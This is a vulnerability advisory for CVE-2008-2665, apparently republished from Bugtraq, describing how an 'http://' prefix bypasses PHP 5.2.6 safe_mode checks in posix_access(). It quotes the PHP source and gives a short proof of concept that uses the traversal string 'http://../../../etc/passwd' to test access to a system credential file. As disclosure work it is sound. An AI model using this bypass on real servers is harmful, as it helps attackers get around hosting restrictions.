PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

Published
Credit
Risk
2008.06.17
Maksymilian Arciemowicz
Low
CWE
CVE
Local
Remote
CWE-264
CVE-2008-2665
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz
Date:
- Written: 10.05.2008
- Public: 17.06.2008

CVE: CVE-2008-2665
CWE: CWE-264
Risk: Low

Affected Software: PHP 5.2.6
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

posix_access ? Determine accessibility of a file

SYNOPSIS:

bool posix_access ( string $file [, int $mode ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. WE WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. PHP 5.2.6 posix_access() safe_mode bypass ---
Let's see to posix_access() function

- ---
PHP_FUNCTION(posix_access)
{
long mode = 0;
int filename_len, ret;
char *filename, *path;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) {
RETURN_FALSE;
}

path = expand_filepath(filename, NULL TSRMLS_CC);

if (!path) {
POSIX_G(last_error) = EIO;
RETURN_FALSE;
}

if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
efree(path);
POSIX_G(last_error) = EPERM;
RETURN_FALSE;
}

ret = access(path, mode);
efree(path);

if (ret) {
POSIX_G(last_error) = errno;
RETURN_FALSE;
}

RETURN_TRUE;
}
- ---

var_dump(posix_access("http://../../../etc/passwd"))==True
var_dump(posix_access("/etc/passwd"))==False

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); will change "http://../../../etc/passwd" to path=/etc/passwd

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check realy path "http://../../../etc/passwd". http:// is using in php_checkuid_ex(), so safe_mode is bypassed.

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. We WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 2. How to Fix ---
Do not use safe_mode as a main safety

- --- 3. Author ---
Author:Maksymilian Arciemowicz


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com